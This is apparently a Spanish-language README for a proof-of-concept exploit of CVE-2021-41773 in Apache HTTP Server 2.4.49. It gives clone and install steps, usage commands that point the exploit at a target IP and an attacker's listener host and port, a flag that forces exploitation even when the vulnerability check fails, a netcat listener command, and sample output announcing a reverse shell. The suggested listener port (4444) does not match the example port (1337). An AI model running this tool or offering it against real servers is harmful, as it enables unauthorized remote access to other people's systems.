
Exploit de prueba de concepto para CVE-2021-41773, una vulnerabilidad de path traversal y ejecución remota de código en Apache HTTP Server 2.4.49. Automatiza la verificación de vulnerabilidad y la ejecución de payload de reverse shell.
Este es un exploit de prueba de concepto para CVE-2021-41773, una vulnerabilidad de path traversal y ejecución remota de código en Apache HTTP Server 2.4.49.
git clone https://github.com/adrianmafandy/CVE-2021-41773
cd CVE-2021-41773
pip install requests
# Sintaxis básica
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT>
# Forzar explotación incluso si falla la comprobación de vulnerabilidad
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT> -f
# Sintaxis básica
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337
# Forzar explotación incluso si falla la comprobación de vulnerabilidad
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337 -f
Antes de ejecutar el exploit, configure un listener de netcat:
nc -lvnp 4444
$ python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337
______
(_____ \
_____) ) _ _ ____ ____ ___ ____
| ____/ | | | _ \ / ___) _ \ / _ |
| | | | | | | | | | | |_| ( (_| |
|_| \___/|_| |_|_| \___/ \___ |
(_____|
Apache2 2.4.49 - CVE-2021-41773
[*] Checking if target is vulnerable...
[+] Target is VULNERABLE!
[*] Executing reverse shell payload...
[+] Reverse shell payload executed successfully!
[*] Check your listener